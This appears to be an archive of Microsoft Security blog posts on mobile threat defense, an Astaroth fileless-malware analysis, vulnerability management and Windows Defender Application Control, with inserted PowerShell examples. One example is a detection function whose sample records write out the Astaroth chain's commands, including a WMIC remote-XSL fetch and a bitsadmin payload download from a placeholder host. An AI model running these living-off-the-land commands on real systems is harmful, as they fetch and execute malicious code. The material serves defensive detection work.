Category Archives: Threat Protection

How to cost-effectively manage and secure a mobile ecosystem

Today’s post was written by Roxane Suau, Vice President of Marketing for Pradeo.

In the corporate environment, mobile devices and applications are at the center of communications, enhancing collaborators’ productivity with 24/7 access to information. But at the same time, they represent thousands of direct entry points to organizations’ information systems, exposing critical data to the wide spectrum of mobile threats.

Our increasingly connected world is driving up the volume of cyberattacks targeting mobility. In 2017, there were 42 million attack attempts on mobile devices registered globally, and this number keeps growing.

While data protection laws urge companies to ensure mobile data privacy, security teams are faced with the challenge of protecting mobile devices, applications, and files while maintaining the flexibility collaborators need to be efficient.

The booming of mobility

According to a Gartner survey, nearly 80 percent of employees haven’t received employer-issued smartphones and more than 50 percent of them exclusively use their personal mobile device in the workplace (BYOD).

As organizations become more flexible regarding working tools and locations, employees often access business data and applications from home or public spaces using their mobile device, connecting over unsecured networks.

Usually, cybercriminals leverage three vectors to infiltrate mobile devices: applications, the network, and the operating system (OS). Threats operating at the application level, such as leaky and malicious applications, are by far the most common and represent 78 percent of all attacks. Attacks perpetrated through the network and the OS account for 12 percent and 10 percent, respectively.

Enterprise mobility has led to the obsolescence of standard network security solutions historically used by companies, as they don’t cover the perimeter of mobile devices and applications. In recent years, the Mobile Threat Defense (MTD) technology has taken over.

Microsoft Intune unified endpoint management + Pradeo Security Mobile Threat Defense

Microsoft and Pradeo (a member of the Microsoft Intelligent Security Association) joined forces a few years ago to pursue a common goal: enable a productive and safe connected workspace.

To help companies set up a more secure and compliant environment, Microsoft Intune, a unified endpoint management platform, offers the functionalities necessary to manage and secure mobile devices and applications. Furthermore, it extends the activation of mobile security capabilities through partner integrations.

Pradeo Security Mobile Threat Defense (MTD) is designed to work with Intune to protect smartphones, tablets, mobile apps, and data. The solution relies on a behavioral analysis engine to precisely detect all actions performed on mobile devices (malware, data leakage, network exploit, OS manipulation). When activated in Intune, customers deploy the Pradeo Security agent on mobile devices to ensure their 360-degree real-time protection.

Pradeo stands out from other MTD solutions, which perform score-based risk evaluation, by being the only vendor on the market that offers an accurate mobile threat detection. Intune customers benefit from Pradeo’s precise threat detection directly in their UEM platform, strengthening their organization’s mobile security posture in the most cost-efficient way.

About Pradeo

Pradeo is a global leader of mobile security and a member of the Microsoft Intelligent Security Association. It offers services to protect the data handled on mobile devices and applications, and tools to collect, process, and get value out of mobile security events.

Pradeo’s cutting-edge technology was recognized as one of the most advanced mobile security technologies by Gartner, IDC, and 37 other research firms in 2018. It provides reliable detection of mobile threats to prevent breaches and reinforce compliance with data privacy regulations.

For more details, visit or write to

Note: Users must be entitled separately to Pradeo and Microsoft licenses as appropriate.

The post How to cost-effectively manage and secure a mobile ecosystem appeared first on Microsoft Security.

Microsoft Intelligent Security Association welcomes members of the Microsoft Virus Initiative

As we head into our annual partner conference, Microsoft Inspire, I’m excited to make a major announcement! The Microsoft Virus Initiative (MVI) is formally joining the Microsoft Intelligent Security Association (MISA).

For more than 20 years, Microsoft and our antimalware partners have collaborated through MVI to help develop integrated and compatible solutions for Windows. MISA was created as an ecosystem of independent software vendors that have integrated their security solutions to help defend against a world of increasing threats. Our mission is to provide better security for our shared customers by integrating across the security ecosystem to gain more signals, increase visibility, and better protect against threats. That’s why we’re thrilled to welcome members of MVI!

Stopping malware at scale with the power of the cloud

Antivirus and antimalware products have long been the backbone of security solutions. As modern security products evolve, more antimalware providers are taking advantage of the power of the cloud, transforming how we protect, detect, and respond to threats at scale. Antimalware products play a key role in achieving our shared vision of collaboration that reduces security complexity and delivers better protection to customers.

By joining MISA, Microsoft’s antimalware partners will help break down silos and help customers realize the benefit of using solutions from multiple vendors in harmony. This is done by connecting the security ecosystem to gain more signal, increase visibility, and protect against threats.

At the annual MVI Partner Forum in Redmond, Washington, Microsoft reiterated that we’re investing heavily in both security and partnerships throughout the upcoming fiscal year. This includes expanding the size of the association and adding additional member benefits.

As a security provider to 95 percent of the Fortune 500, our customers are diverse and have different needs and configurations. In 2018, we created MISA to build an ecosystem of intelligent security solutions that better defend against a world of increased threats by sharing security signals across the Microsoft security stack. Since its launch, the organization has more than doubled, and we now have 59 members. Most recently, as part of Microsoft’s participation in the FIDO2 alliance, we welcomed new FIDO key partners Feitian and HID Global. You can read more about these partnerships in this recent blog.

Security ISVs interested in joining MISA can get started by building an integration with one of the Microsoft security products included in MISA.

The post Microsoft Intelligent Security Association welcomes members of the Microsoft Virus Initiative appeared first on Microsoft Security.

Dismantling a fileless campaign: Microsoft Defender ATP next-gen protection exposes Astaroth attack

The prevailing perception about fileless threats, among the security industry’s biggest areas of concern today, is that security solutions are helpless against these supposedly invincible threats. Because fileless attacks run the payload directly in memory or leverage legitimate system tools to run malicious code without having to drop executable files on the disk, they present challenges to traditional file-based solutions.

But let’s set the record straight: being fileless doesn’t mean being invisible; it certainly doesn’t mean being undetectable. There’s no such thing as the perfect cybercrime: even fileless malware leaves a long trail of evidence that advanced detection technologies in Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP) can detect and stop.

To help disambiguate the term fileless, we developed a comprehensive definition for fileless malware as reference for understanding the wide range of fileless threats. We have also discussed at length the advanced capabilities in Microsoft Defender ATP that counter fileless techniques.

I recently unearthed a widespread fileless campaign called Astaroth that completely “lived off the land”: it only ran system tools throughout a complex attack chain. The attack involved multiple steps that use various fileless techniques and proved a great real-world benchmark for Microsoft Defender ATP’s capabilities against fileless threats.

In this blog, I will share my analysis of a fileless attack chain that demonstrates:

  • Attackers would go to great lengths to avoid detection
  • Advanced technologies in Microsoft Defender ATP next-generation protection expose and defeat fileless attacks

Exposing a fileless info-stealing campaign with Microsoft Defender ATP next-generation protection

I was doing a standard review of Windows Defender Antivirus telemetry when I noticed an anomaly from a detection algorithm designed to catch a specific fileless technique. Telemetry showed a sharp increase in the use of the Windows Management Instrumentation Command-line (WMIC) tool to run a script (a technique that MITRE refers to as XSL Script Processing), indicating a fileless attack.

Figure 1. Windows Defender Antivirus telemetry shows a sudden increase in suspicious activity

After some hunting, I discovered the campaign that aimed to run the Astaroth backdoor directly in memory. Astaroth is a notorious info-stealing malware known for stealing sensitive information like credentials, keystrokes, and other data, which it exfiltrates and sends to a remote attacker. The attacker can then use stolen data to try moving laterally across networks, carry out financial theft, or sell victim information in the cybercriminal underground.

While the behavior may vary slightly in some instances, the attack generally followed these steps: A malicious link in a spear-phishing email leads to an LNK file. When double-clicked, the LNK file causes the execution of the WMIC tool with the “/Format” parameter, which allows the download and execution of JavaScript code. The JavaScript code in turn downloads payloads by abusing the Bitsadmin tool.

All the payloads are Base64-encoded and decoded using the Certutil tool. Two of them result in plain DLL files (the others remain encrypted). The Regsvr32 tool is then used to load one of the decoded DLLs, which in turn decrypts and loads other files until the final payload, Astaroth, is injected into the Userinit process.

Figure 2. Astaroth “living-off-the-land” attack chain showing multiple legitimate tools abused

It’s interesting to note that at no point during the attack chain is any file run that’s not a system tool. This technique is called living off the land: using legitimate tools that are already present on the target system to masquerade as regular activity.

The attack chain above shows only the Initial Access and Execution stages. In these stages, the attackers used fileless techniques to attempt to silently install the malware on target devices. Astaroth is a notorious information stealer with many other post-breach capabilities that are not discussed in this blog. Preventing the attack in these stages is critical.

Despite its use of “invisible” techniques, the attack chain runs under the scrutiny of Microsoft Defender ATP. Multiple advanced technologies at the core of Windows Defender Antivirus, which is the next-generation protection component of Microsoft Defender ATP, expose these techniques to spot and stop a wide range of attacks.

These protection technologies stop threats at first sight, use the power of the cloud, and leverage Microsoft’s industry-leading optics to deliver effective protection. This defense-in-depth is observed in the way these technologies uncovered and blocked the attack at multiple points in Astaroth’s complex attack chain.

Figure 3. Microsoft Defender ATP solutions for fileless techniques used by Astaroth

For traditional, file-centric antivirus solutions, the only window of opportunity to detect this attack may be when the two DLLs are decoded after being downloaded—after all, every executable used in the attack is non-malicious. If this were the case, this attack would pose a serious problem: since the DLLs use code obfuscation and are likely to change very rapidly between campaigns, focusing on these DLLs would be a vicious trap.

However, as mentioned, next-generation protection capabilities in Microsoft Defender ATP catch fileless techniques. Let’s break down the attack steps, enumerate the techniques used (with MITRE technique IDs as reference), and map the relevant Microsoft Defender ATP protection.


Step 1: Arrival

The victim receives an email with a malicious URL:

The URL uses misleading names like certidao.htm (Portuguese for “certificate”), abrir_documento.htm (“open document”), pedido.htm (“order”), etc.

When clicked, the malicious link redirects the victim to a ZIP archive, which contains a similarly misleadingly named LNK file, certidao.htm.lnk. When clicked, the LNK file runs an obfuscated BAT command line.

MITRE techniques observed:

  • T1192 – Spearphishing Link
  • T1023 – Shortcut Modification

Microsoft Defender ATP next-gen protection defenses:

  • Command-line scanning: Trojan:Win32/BadEcho.A
  • Heuristics engine: Trojan:Win32/Linkommer.A
  • Windows Defender SmartScreen


Step 2: WMIC abuse, part 1

The BAT command runs the system tool WMIC.exe:

The use of the parameter /format causes WMIC to download the file v.txt, which is an XSL file hosted on a legitimate-looking domain. The XSL file hosts an obfuscated JavaScript that is automatically run by WMIC. This JavaScript code simply runs WMIC again.

MITRE techniques observed:

  • T1047 – Windows Management Instrumentation
  • T1220 – XSL Script Processing
  • T1064 – Scripting
  • T1027 – Obfuscated Files Or Information

Microsoft Defender ATP next-gen protection defenses:

  • Behavior monitoring engine: Behavior:Win32/WmiFormatXslScripting
  • AMSI integration engine: Trojan:JS/CovertXslDownload


Step 3: WMIC abuse, part 2

WMIC is run in a fashion similar to the previous step:

WMIC downloads vv.txt, another XSL file containing an obfuscated JavaScript code, which uses the Bitsadmin, Certutil, and Regsvr32 tools for the next steps.

MITRE techniques observed:

  • T1047 – Windows Management Instrumentation
  • T1220 – XSL Script Processing
  • T1064 – Scripting
  • T1027 – Obfuscated Files Or Information

Microsoft Defender ATP next-gen protection defenses:

  • Behavior monitoring engine: Behavior:Win32/WmiFormatXslScripting
  • Behavior monitoring engine: Behavior:Win32/WmicLoadDll.A
  • AMSI integration engine: Trojan:JS/CovertBitsDownload.C


Step 4: Bitsadmin abuse

Multiple instances of Bitsadmin are run to download additional payloads:

The payloads are Base64-encoded and have file names like: falxconxrenwb.~, falxconxrenw64.~, falxconxrenwxa.~, falxconxrenwxb.~, falxconxrenw98.~, falxconxrenwgx.gif, falxfonxrenwg.gif.

MITRE techniques observed:

Microsoft Defender ATP next-gen protection defenses:

  • Behavior monitoring engine: Behavior:Win32/WmicBits.A


Step 5: Certutil abuse

The Certutil system tool is used to decode the downloaded payloads:

Only a couple of files are decoded to a DLL; most are still encrypted/obfuscated.

MITRE technique observed:

  • T1140 – Deobfuscate/Decode Files Or Information

Microsoft Defender ATP next-gen protection defenses:

  • Behavior monitoring engine: Behavior:Win32/WmiCertutil.A


Step 6: Regsvr32 abuse

One of the decoded payload files (a DLL) is run within the context of the Regsvr32 system tool:

The file falxconxrenw64.~ is a proxy: it loads and runs a second DLL, falxconxrenw98.~, and passes it to a third DLL that is obtained by reading files falxconxrenwxa.~ and falxconxrenwxb.~. The DLL falxconxrenw98.~ then reflectively loads the third DLL.

MITRE techniques observed:

  • T1117 – Regsvr32
  • T1129 – Execution Through Module Load
  • T1140 – Deobfuscate/Decode Files Or Information

Microsoft Defender ATP next-gen protection defenses:

  • Behavior monitoring engine: Behavior:Win32/UserinitInject.B
  • Attack surface reduction: An attack surface reduction rule detects the loading of a DLL that does not meet the age and prevalence criteria (i.e., a new unknown DLL)


Step 7: Userinit abuse

The newly loaded DLL reads and decrypts the file falxconxrenwgx.gif into a DLL. It runs the system tool userinit.exe into which it injects the decrypted DLL. The file falxconxrenwgx.gif is again a proxy that reads, decrypts, and reflectively loads the DLL falxconxrenwg.gif. This last DLL is the malicious info stealer known as Astaroth.

MITRE techniques observed:

  • T1117 – Regsvr32
  • T1129 – Execution Through Module Load
  • T1140 – Deobfuscate/Decode Files Or Information

Microsoft Defender ATP next-gen protection defenses:

  • Behavior monitoring engine: Behavior:Win32/Astaroth.A
  • Attack surface reduction: An attack surface reduction rule detects the loading of a DLL that does not meet the age and prevalence criteria (i.e., a new unknown DLL)
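As an added example (not code from the original post), the following PowerShell hunting function flags the tool-abuse steps described above when run over process-creation records of the kind Sysmon Event ID 1 or Security Event 4688 (with command-line auditing) produce; the sample records, paths and the example.invalid hostname are constructed.

```powershell
# Hunting helper for the living-off-the-land chain described in this post. Input records
# carry the ParentImage / Image / CommandLine fields found in Sysmon Event ID 1 or
# Security Event 4688 with command-line auditing enabled. All sample values are constructed.
function Get-LolbinAlert {
    param([Parameter(Mandatory)][hashtable[]]$Events)

    # One command-line rule per abused tool. Patterns are kept narrow so that routine
    # administrative use (certutil -verify, regsvr32 of a System32 DLL) is not flagged.
    $rules = @(
        @{ Image = 'wmic.exe';      Pattern = '/format:\s*"?https?://'
           Label = 'T1220 WMIC /format fetching a remote XSL' }
        @{ Image = 'bitsadmin.exe'; Pattern = '/transfer\b.*https?://'
           Label = 'Bitsadmin download of a remote file' }
        @{ Image = 'certutil.exe';  Pattern = '\s-decode\s'
           Label = 'T1140 Certutil Base64 decode' }
        @{ Image = 'regsvr32.exe';  Pattern = '\\(users|programdata)\\[^\s"]+\.(~|gif|txt|jpg)("|\s|$)'
           Label = 'T1117 Regsvr32 loading a non-DLL-named module from a user-writable path' }
    )
    # In the chain, the XSL script spawned each of these directly from WMIC.
    $wmicChildren = 'wmic.exe', 'bitsadmin.exe', 'certutil.exe', 'regsvr32.exe'

    foreach ($e in $Events) {
        $image   = [System.IO.Path]::GetFileName($e.Image).ToLowerInvariant()
        $parent  = [System.IO.Path]::GetFileName($e.ParentImage).ToLowerInvariant()
        $reasons = @()

        foreach ($r in $rules) {
            if ($image -eq $r.Image -and $e.CommandLine -match $r.Pattern) { $reasons += $r.Label }
        }
        if ($parent -eq 'wmic.exe' -and $wmicChildren -contains $image) {
            $reasons += 'Spawned by WMIC (script execution via /format)'
        }

        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Image       = $image
                Parent      = $parent
                CommandLine = $e.CommandLine
                Reasons     = ($reasons -join '; ')
            }
        }
    }
}

# Constructed sample records modelled on the chain above; example.invalid is a reserved
# placeholder domain, not a campaign host.
$SampleEvents = @(
    @{ ParentImage = 'C:\Windows\System32\cmd.exe'
       Image       = 'C:\Windows\System32\wbem\WMIC.exe'
       CommandLine = 'WMIC.exe os get /format:"https://example.invalid/v.txt"' }
    @{ ParentImage = 'C:\Windows\System32\wbem\WMIC.exe'
       Image       = 'C:\Windows\System32\bitsadmin.exe'
       CommandLine = 'bitsadmin /transfer job https://example.invalid/falxconxrenw64.b64 C:\Users\Public\Libraries\falxconxrenw64.b64' }
    @{ ParentImage = 'C:\Windows\System32\wbem\WMIC.exe'
       Image       = 'C:\Windows\System32\certutil.exe'
       CommandLine = 'certutil -decode C:\Users\Public\Libraries\falxconxrenw64.b64 C:\Users\Public\Libraries\falxconxrenw64.~' }
    @{ ParentImage = 'C:\Windows\System32\wbem\WMIC.exe'
       Image       = 'C:\Windows\System32\regsvr32.exe'
       CommandLine = 'regsvr32 /s C:\Users\Public\Libraries\falxconxrenw64.~' }
    # Benign look-alikes that must not fire.
    @{ ParentImage = 'C:\Windows\System32\cmd.exe'
       Image       = 'C:\Windows\System32\certutil.exe'
       CommandLine = 'certutil -verify C:\certs\corp-root.cer' }
    @{ ParentImage = 'C:\Windows\System32\msiexec.exe'
       Image       = 'C:\Windows\System32\regsvr32.exe'
       CommandLine = 'regsvr32 /s C:\Windows\System32\scrrun.dll' }
)

Get-LolbinAlert -Events $SampleEvents | Format-Table -AutoSize -Wrap
```

The four chain records each carry at least one reason (the three WMIC children carry two), while the two benign records produce no output; in production the same function can be fed `Get-WinEvent` output mapped to the three fields.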

Comprehensive protection against fileless attacks with Microsoft Threat Protection

The strength of next-generation protection engines in exposing fileless techniques adds to the capabilities of the unified endpoint protection platform, Microsoft Defender ATP. Activities related to fileless techniques are reported in Microsoft Defender Security Center as alerts, so security operations teams can further investigate and respond to attacks using endpoint detection and response, advanced hunting, and other capabilities in Microsoft Defender ATP.


Figure 4. Details of Windows Defender Antivirus detections of fileless techniques and malware reported in Microsoft Defender Security Center; details also indicate whether threat is remediated, as was the case with the Astaroth attack

The rest of Microsoft Defender ATP’s capabilities beyond next-generation protection enable security operations teams to detect and remediate fileless threats and other attacks. Notably, Microsoft Defender ATP endpoint detection and response (EDR) has strong and durable detections for fileless and living-off-the-land techniques across the entire attack chain.


Figure 5. Alerts in Microsoft Defender Security Center showing detection of fileless techniques by antivirus and EDR capabilities

We also published a threat analytics report on living-off-the-land binaries to help security operations assess organizational security posture and resilience against these threats. New Microsoft Defender ATP services like threat and vulnerability management and Microsoft Threat Experts (managed threat hunting) further assist organizations in defending against fileless threats.

Through signal-sharing and orchestration of threat remediation across Microsoft’s security technologies, these protections are further amplified in Microsoft Threat Protection, Microsoft’s comprehensive security solution for the modern workplace. For this Astaroth campaign, Office 365 Advanced Threat Protection (Office 365 ATP) detects the emails with malicious links that start the infection chain.

Microsoft Threat Protection secures identities, endpoints, email and data, apps, and infrastructure.

Conclusion: Fileless threats are not invisible

To come back to one of my original points in this blog post, being fileless doesn’t mean being invisible; it certainly doesn’t mean being undetectable.

An analogy: Pretend you are transported to the world of H.G. Wells’ The Invisible Man and can render yourself invisible. You think, great, you can walk straight into a bank and steal money. However, you soon realize that things are not as simple as they sound. When you walk out in the open and it’s cold, your breath’s condensation gives away your position; depending on the type of ground, you can leave visible footmarks; if it’s raining, water splashing on you creates a visible outline. If you manage to get inside the bank, you still make noise that security guards can hear. Motion detection sensors can feel your presence, and infrared cameras can still see your body heat. Even if you can open a safe or a vault, these storage devices may trigger an alert, or someone may simply notice the safe opening. Not to mention that if you somehow manage to grab the money and put it in a bag, people are likely to notice a bag that’s walking itself out of the bank.

Being invisible may help you for some things, but you should not be under the illusion that you are invincible. The same applies to fileless malware: abusing fileless techniques does not put malware beyond the reach or visibility of security software. On the contrary, some of the fileless techniques may be so unusual and anomalous that they draw immediate attention to the malware, in the same way that a bag of money moving by itself would.

Using invisible techniques and being actually invisible are two different things. Using advanced technologies, Microsoft Defender ATP exposes fileless threats like Astaroth before these attacks can cause more damage.


Andrea Lelli
Microsoft Defender ATP Research



Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft Defender ATP community.

Follow us on Twitter @MsftSecIntel.

The post Dismantling a fileless campaign: Microsoft Defender ATP next-gen protection exposes Astaroth attack appeared first on Microsoft Security.

Microsoft’s Threat & Vulnerability Management now helps thousands of customers to discover, prioritize, and remediate vulnerabilities in real time

I’m excited to announce that Microsoft’s Threat & Vulnerability Management solution is generally available as of June 30! We have been working closely with customers for more than a year to incorporate their real needs and feedback to better address vulnerability management. Our goal is to empower defenders with the tools they need to better protect against evolving threats, and we believe this solution will help provide that additional visibility and agility they need.

Threat & Vulnerability Management (TVM) is a built-in capability in Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP) that uses a risk-based approach to discover, prioritize, and remediate endpoint vulnerabilities and misconfigurations. With Microsoft Defender ATP’s Threat & Vulnerability Management, customers benefit from:

  • Continuous discovery of vulnerabilities and misconfigurations
  • Prioritization based on business context and dynamic threat landscape
  • Correlation of vulnerabilities with endpoint detection and response (EDR) alerts to expose breach insights
  • Machine-level vulnerability context during incident investigations
  • Built-in remediation processes through unique integration with Microsoft Intune and Microsoft System Center Configuration Manager

Traditional vulnerability scanning only happens periodically, leaving organizations with security blind spots between scans. The one-size-fits-all approach that these traditional solutions use ignores critical business-specific context, as well as the dynamic threat landscape. This is coupled with the fact that mitigation of vulnerabilities is a manual process, often across teams, that can take days, weeks, or months to complete. This leaves a window of opportunity for attackers and puts our defenders in a tough spot.

To address these challenges, Microsoft partnered with a dozen enterprise customers on the design and creation of this new Threat & Vulnerability Management solution. One of them is Telit, a global leader in IoT enablement offering end-to-end IoT solutions, including enterprise-grade hardware, connectivity, platform, and consulting services. Telit already had a well-defined vulnerability management program in place, but said they were missing several critical capabilities, including visibility, prioritization, and remediation.

Our design partners play a key role throughout the entire process, from planning and building to operationalizing and maturing the product so we can deliver the best experience. Many of our customers have existing vulnerability management programs, so we knew that to have them switch to Microsoft we would need a disruptive approach to vulnerability management. From private preview to general availability and beyond, our key goals were to bridge the gap between Security and IT roles in threat protection, to reduce time to threat resolution while enabling real-time prioritization and risk reduction based on the evolving threat landscape and business context. The team continues to incorporate feedback from customers and partners, adding these new capabilities on a monthly basis.

“Telit’s previous threat and vulnerability solutions were limited to on-premises connected endpoints. Moving to Microsoft’s TVM cloud-based solution provides us much better visibility into roaming endpoints with a continuous assessment, especially when our endpoints are connected to untrusted networks.”
— Itzik Menashe, VP of IT & Information Security, Telit

Working together with Telit, we quickly understood that the current prioritization norm is not enough to properly reduce risk in an organization. We consulted with our partners on a new risk-based approach, which is focused on continuous discovery of vulnerabilities and misconfigurations and correlated those insights with context specific to their business and the dynamic threat landscape.

Microsoft’s built-in, end-to-end remediation process helps Telit bridge the gap between their security and operations teams. The unique integration with Microsoft Intune allows their security team to create remediation requests with a click of a button, and the operations team receives the requests automatically with all relevant information and can start the remediation process right away. The security team can then watch their exposure score drop in real time as remediation progresses.

“Microsoft’s TVM provides Telit with an easy-to-use solution that incorporates strong discovery capabilities, a risk-based approach to prioritization, and an effective remediation process. With this solution we are able to cover a large number of endpoints using a very small team of security engineers.”
— Mor Asher, Global IT and Information Security Manager, Telit

The product experience and ease of implementation was a big driver for Telit and thousands of other active customers to start using Microsoft Defender ATP Threat & Vulnerability Management. Telit had Microsoft Defender ATP’s TVM up and running within seconds.

To learn more about threat and vulnerability management, watch our video that walks you through the experience.

If you already have Microsoft Defender ATP, the TVM solution is now available within your ATP portal. If you would like to sign up for a trial of Microsoft Defender ATP including TVM, sign up here.

We’re excited for our customers to evaluate this new solution and are looking forward to continued feedback.

The post Microsoft’s Threat & Vulnerability Management now helps thousands of customers to discover, prioritize, and remediate vulnerabilities in real time appeared first on Microsoft Security.

Delivering major enhancements in Windows Defender Application Control with the Windows 10 May 2019 Update

With the Windows 10 May 2019 Update we delivered several important features for Windows Defender Application Control (WDAC), which was originally introduced to Windows as part of a scenario called Device Guard. WDAC works in conjunction with features like Windows Defender Application Guard, which provides hardware-based isolation of Microsoft Edge for enterprise-defined untrusted sites, to strengthen the security posture of Windows 10 systems.

Our focus for this release was responding to some longstanding feedback on manageability improvements. We’re excited to introduce the following new capabilities in Windows Defender Application Control:

  1. File path rules, including optional runtime admin protection checks
  2. Multiple policy file support with composability
  3. Application Control CSP to provide a new, richer MDM policy management capability
  4. COM object registration support in policy
  5. Disabling script enforcement rule option

Application control is frequently identified as one of the most effective mitigations against modern security threats, because anything that’s not allowed by policy is blocked from running. Even striving towards a simple policy like mandating that only signed code is allowed to execute can be incredibly impactful: in a recent analysis of Windows Defender ATP data, we saw that 96% of malware encountered is unsigned. Systems like Windows 10 in S mode, which uses WDAC technology to enforce that all code must be signed by Windows and Microsoft Store code signing certificates, have no malware infection issues.

The new capabilities are designed to ease the journey for customers adopting application control in real-world environments with large numbers of applications, users, and devices.

File path rules, including optional runtime admin protection checks

For many customers looking to adopt application execution control while balancing IT overhead, rules based on file paths on managed client systems provide a useful model. The Windows 10 May 2019 Update introduces support for both allow and deny rules based on file path in Windows Defender Application Control.

File path rules had been one of the few features available in AppLocker, the older native application control technology, that were not available to WDAC; deployment tools and methodologies built on top of AppLocker like AaronLocker have relied on these rules as an important simplifying option for policy management. As we sought to close that gap, we wanted to preserve the stronger security posture available with WDAC that customers have come to expect. To this end, WDAC applies, by default, an option to check at runtime that apps and executables allowed based on file path rules must come from a file path that’s only writable by administrator or higher privileged accounts. This runtime check provides an additional safeguard for file path rules that are otherwise inherently weaker than other identifiers like hash or signer rules, which rely on cryptographically verifiable attributes.

This runtime capability can be controlled with the “Disabled:Runtime FilePath Rule Protection” rule option.

The following example shows how to easily create rules for anything allowed under “Program Files” and “Program Files (x86)”, and then merge them with the sample policy that allows all Windows signed code (available under C:\Windows\schemas\CodeIntegrity\ExamplePolicies). The resulting merged policy file allows all Windows signed code and applications installed under “Program Files” and “Program Files (x86)” with the runtime protection that checks that anything executing under those paths is coming from a location only writable by administrator or higher privileged accounts.

Sample file path rules
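The procedure the paragraph above describes, written out as an added example rather than the screenshot from the original post. It uses the ConfigCI cmdlets (New-CIPolicyRule, New-CIPolicy, Merge-CIPolicy, ConvertFrom-CIPolicy) on the Windows 10 May 2019 Update or later from an elevated session; the sample policy file name DefaultWindows_Enforced.xml is assumed to be the "all Windows signed code" policy referred to above, and the output paths are assumptions.

```powershell
# Added example: allow everything under Program Files / Program Files (x86) by file path,
# merge with the Windows-signed-code sample policy, keep runtime path protection on, and
# produce the binary policy. Run elevated; requires the ConfigCI module (Windows 10 1903+).

# Assumed: the ExamplePolicies sample that allows all Windows-signed code.
$ExamplePolicy = 'C:\Windows\schemas\CodeIntegrity\ExamplePolicies\DefaultWindows_Enforced.xml'
$PathPolicy    = '.\AllowProgramFiles.xml'   # assumed output names
$MergedPolicy  = '.\MergedPolicy.xml'
$MergedBinary  = '.\MergedPolicy.bin'

# 1. One allow rule per folder; the trailing "\*" covers everything beneath it.
$PathRules  = @()
$PathRules += New-CIPolicyRule -FilePathRule 'C:\Program Files\*'
$PathRules += New-CIPolicyRule -FilePathRule 'C:\Program Files (x86)\*'

# 2. Write those rules into a policy file of their own.
New-CIPolicy -FilePath $PathPolicy -Rules $PathRules

# 3. Merge with the sample policy so the result allows Windows-signed code plus the two paths.
Merge-CIPolicy -PolicyPaths $PathPolicy, $ExamplePolicy -OutputFilePath $MergedPolicy

# 4. Sanity check before deployment: runtime file path protection is on by default and is
#    only switched off by the "Disabled:Runtime FilePath Rule Protection" option, so the
#    merged XML must not carry that option. Without it, anything executed from the two
#    paths must live in a location writable only by administrators or higher.
$xml      = [xml](Get-Content -Path $MergedPolicy -Raw)
$disabled = $xml.SiPolicy.Rules.Rule | Where-Object { $_.Option -eq 'Disabled:Runtime FilePath Rule Protection' }
if ($disabled) {
    throw "Runtime file path rule protection is disabled in $MergedPolicy; path rules would be unprotected."
}

# 5. Convert to the binary form that Code Integrity consumes.
ConvertFrom-CIPolicy -XmlFilePath $MergedPolicy -BinaryFilePath $MergedBinary
```

Deploy the resulting binary through the usual WDAC channels (Group Policy, MDM, or copying to the CodeIntegrity folder); test in audit mode first on a representative device, since a path rule only admits files that are both under the path and in an admin-only-writable location.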

Multiple policy file support with composability

Limiting support to a single policy file means that a variety of app control scenarios from potentially different stakeholders or business groups need to be maintained in one place. This comes with an associated overhead: the coordination required to converge on the appropriate rules encapsulated in a single policy file.

With the Windows 10 May 2019 Update multiple policy files are supported for WDAC. To facilitate composing behavior from multiple policy files, we have introduced the concept of base and supplemental policies:

  • Base policies – For any execution to be allowed, the application must pass each base policy independently. Base policies are used together to further restrict what’s allowed. For example:
    Let’s assume a system has two policies: Base Policy A and Base Policy B with their own sets of rules. For foo.exe to run, it must be allowed by the rules in Base Policy A and also the rules in Base Policy B. Windows Defender Application Control policies on prior Windows 10 systems will continue to work on the May 2019 Update and will be treated as base policies.
  • Supplemental policies – As the name suggests, supplemental policies complement base policies with additional rules that are considered as part of the base policy they correspond to. A supplemental policy is tied to a specific base policy by that base policy's ID; a base policy may have multiple supplemental policies. Supplemental policies can only expand what the base policy they are tied to allows: deny rules specified in a supplemental policy are not honored.
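To make the evaluation rules concrete, here is an added PowerShell example (mine, not code from the post or from the ConfigCI module) in two parts: a small model of the allow decision over base and supplemental policies as the bullets describe it, followed by the cmdlets that tie a supplemental policy to a base policy and compile both. Assumptions: the model treats a file as a plain identifier rather than a hash, signer or path match; the rule that a deny inside a base policy wins over its own allow rules is standard WDAC behaviour that the post does not spell out; `Base.xml` and `Supp.xml` are placeholder file names; and the cmdlet parameters (`Set-CIPolicyIdInfo -ResetPolicyID`, `-BasePolicyToSupplementPath`) and the `CiPolicies\Active` folder are as I know them from the May 2019 Update.

```powershell
# Added example, not from the original post. Part 1: model of the composition rules.
function Test-CompositeAllow {
    param(
        [Parameter(Mandatory)][string]$File,
        # Each base policy: @{ Allow = @(); Deny = @(); Supplementals = @( @{ Allow = @(); Deny = @() }, ... ) }
        [Parameter(Mandatory)][hashtable[]]$BasePolicies
    )
    foreach ($base in $BasePolicies) {
        # A deny rule in a base policy takes precedence over allow rules (standard WDAC, assumed).
        if ($base.Deny -contains $File) { return $false }
        # Supplementals only add allow rules to their base; their deny rules are ignored.
        $allowed = @($base.Allow)
        foreach ($supp in @($base.Supplementals | Where-Object { $_ })) { $allowed += @($supp.Allow) }
        # The file must pass THIS base (with its supplementals) and, via the loop, every other base.
        if ($allowed -notcontains $File) { return $false }
    }
    return $true
}

# Constructed scenario: two base policies, the second one with a supplemental policy.
$baseA = @{ Allow = @('foo.exe', 'bar.exe'); Deny = @();          Supplementals = @() }
$baseB = @{ Allow = @('bar.exe');            Deny = @('evil.exe'); Supplementals = @(
              @{ Allow = @('foo.exe'); Deny = @('bar.exe') } ) }
$system = @($baseA, $baseB)

Test-CompositeAllow -File 'foo.exe'  -BasePolicies $system   # allowed by A directly, by B through its supplemental
Test-CompositeAllow -File 'bar.exe'  -BasePolicies $system   # the supplemental deny of bar.exe is not honored
Test-CompositeAllow -File 'baz.exe'  -BasePolicies $system   # no base allows it
Test-CompositeAllow -File 'evil.exe' -BasePolicies $system   # base B denies it, whatever A says

# Part 2: the cmdlets that produce the same structure on disk.
Import-Module ConfigCI
# Convert a pre-1903 single policy into the multiple-policy format (new PolicyID) and
# permit supplementals (option 17, Enabled:Allow Supplemental Policies).
Set-CIPolicyIdInfo -FilePath .\Base.xml -ResetPolicyID
Set-RuleOption     -FilePath .\Base.xml -Option 17
# Give the supplemental its own PolicyID, then point its BasePolicyID at the base.
Set-CIPolicyIdInfo -FilePath .\Supp.xml -ResetPolicyID
Set-CIPolicyIdInfo -FilePath .\Supp.xml -BasePolicyToSupplementPath .\Base.xml
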